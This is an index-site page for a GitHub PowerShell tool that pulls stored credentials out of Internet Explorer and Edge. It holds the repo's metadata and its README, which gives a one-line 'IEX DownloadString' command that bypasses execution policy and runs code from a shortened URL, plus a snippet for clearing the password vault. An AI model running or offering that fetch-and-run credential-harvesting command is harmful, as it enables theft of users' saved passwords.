Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/HanseSecure/credgrap_ie_edge
Extract stored credentials from Internet Explorer and Edge
https://github.com/HanseSecure/credgrap_ie_edge
Last synced: 3 months ago
JSON representation
Extract stored credentials from Internet Explorer and Edge
- Host: GitHub
- URL: https://github.com/HanseSecure/credgrap_ie_edge
- Owner: HanseSecure
- License: gpl-3.0
- Created: 2018-04-23T11:10:57.000Z (over 6 years ago)
- Default Branch: master
- Last Pushed: 2020-09-15T11:11:30.000Z (about 4 years ago)
- Last Synced: 2024-04-08T11:35:38.693Z (7 months ago)
- Language: PowerShell
- Size: 52.7 KB
- Stars: 319
- Watchers: 21
- Forks: 71
- Open Issues: 1
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# credgrap_ie_edge
Content: Extract stored credentials from Internet Explorer and Edge
Author: Florian Hansemann | @HanseSecure | https://hansesecure.de
Date: 04/2018
## Usage
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/2K75g15')"## Recommendation
### Powershell Solution
[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
$vault = New-Object Windows.Security.Credentials.PasswordVault
$vault.RetrieveAll() | ForEach {$vault.Remove($_)}Thanks @nongiach for Info
### Other Solution
Don't save any passwords within your browser and use password safes ;-)### Additionally Information
I was informed by @jaredhaight that this code was already used in the past. I Didn't know that, but i want to add the link to that post https://www.toddklindt.com/blog/_layouts/mobile/dispform.aspx?List=56f96349-3bb6-4087-94f4-7f95ff4ca81f&ID=606I think the smaller the code, the bigger the chance to develop something 'old'.